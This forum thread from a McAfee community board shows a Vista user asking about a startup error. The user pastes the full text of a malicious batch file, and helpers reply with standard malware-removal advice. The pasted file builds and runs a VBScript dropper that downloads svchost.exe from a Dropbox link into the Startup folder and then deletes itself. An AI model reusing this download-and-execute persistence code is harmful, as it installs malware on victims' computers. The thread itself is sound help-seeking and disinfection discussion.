5 Replies Latest reply on Jul 10, 2012 5:41 AM by Peter M

    Windows Script Host Error

      Hi,

       

      A few days ago, my windows vista 32, got an error message when I turn on my computer. The error message as below:

      wch.jpg

       

       

      After that, I try to ask my friends about this issue. he advised me to run msconfig and go to startup tab to see the entries when I do start my pc.

      I tried Look for something with a ".vbs" extension but I do not find the process to file with the extension. Instead, I found a process in the c:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup\Myvirus.bat

       

      contents of the file myvirus.bat looks like this:

       

      function PreloadFiles takes nothing returns nothing

       

          call Preload( "")

      echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") > %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objXMLHTTP.open "GET", "https://dl.dropbox.com/s/5dg9ip1kog1v6f3/svchost.exe", false >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objXMLHTTP.send() >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo Set objADOStream = CreateObject("ADODB.Stream") >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.Open >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.Type = 1 >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.Position = 0 >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo If objFSO.Fileexists("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\svchost.exe") Then objFSO.DeleteFile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\svchost.exe" >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.SaveToFile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\svchost.exe" >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objADOStream.Close >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo End if >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objFSO.DeleteFile "%TEMP%\\download.vbs" >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      echo objFSO.DeleteFile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat" >> %TEMP%\\download.vbs

      //" )

          call Preload( "")

      start %TEMP%\\download.vbs

      //" )

          call PreloadEnd( 0.1 )

       

      endfunction

       

       

      I tried deleting the file, and the error was not case anymore. I want to ask, can I delete these myvirus.bat files? and what is the function of that file? where it comes from a file like that?

       

      Sorry if my english is not good...

       

      Thank you.

        • 1. Re: Windows Script Host Error
          Peter M

          Moved to the Malware section.  I trust this is Vista SP2 and fully updated?

           

          Look at the following page and try in this order, System Restore, Stinger and Malwarebytes Free and if all else fails the Hijackthis routine.

           

          All that with hints and download links is shown here:  https://community.mcafee.com/docs/DOC-2168

           

          myvirus.bat is a trojan according to a Google Search but be wary of some of the so-called cures out there.   Most seem to be from risky sources.

           

          Use SiteAdvisor and WoT as browser warnings against bad web sites.

           

          Message was edited by: Ex_Brit on 08/07/12 8:09:21 EDT AM
          • 2. Re: Windows Script Host Error

            Hi Ex_Brit....

             

            Thanks for your reply. I've tried the tools you suggested. but it seems to do a restore point is the best way.

            • 3. Re: Windows Script Host Error
              Peter M

              Did it work?

              • 4. Re: Windows Script Host Error

                I do not know if this can work well, but in 2 days is not seen no process for myvirus.bat file at startup.

                 

                Before doing the restore point, I tried scanning using tools such as the following:

                 

                GetSusp, scan using the tool is reported, there are 6 files are suspicious. and the scan results automatically sent to MacAfee lab.

                Whereas for RootkitRemover tool, Stinger, Windows Defender and Malwarebytes report that my pc is safe and clean from malicious files, but every time I turn on my computer, always pop up from windows script host, who reported an error to file download.vbs and there is also a process at startup for myvirus.bat although I have deleted that file.

                 

                Before doing the restore point, I had time to scan using mcafee total protection, but there are no reports for virus or trojans on my pc. This is different after I do a restore point, there were reports in mcafee total portection tells me that there are 3 trojan. and I dont know if the trojan is already deleted or not because there is no report to it.

                 

                Earlier (after doing restore point), I try to open task manager and see there are 3 process to rundll32.exe. See the picture below:

                taskmanager.jpg

                 

                 

                whether it is a normal process for rundll32.exe? if myvirus.bat is part of a trojan, why there is a message from the windows script host there is an error?

                 

                Thank you.

                • 5. Re: Windows Script Host Error
                  Peter M

                  I can't tell you what they represent except to say that I also have those same rundll processes showing in my Task Manager.

                   

                  Look in the link at the bottom of my signature and run Hijackthis, post its log on one of the forums represented there and they will analyses the log and tell you if anything nasty is still around.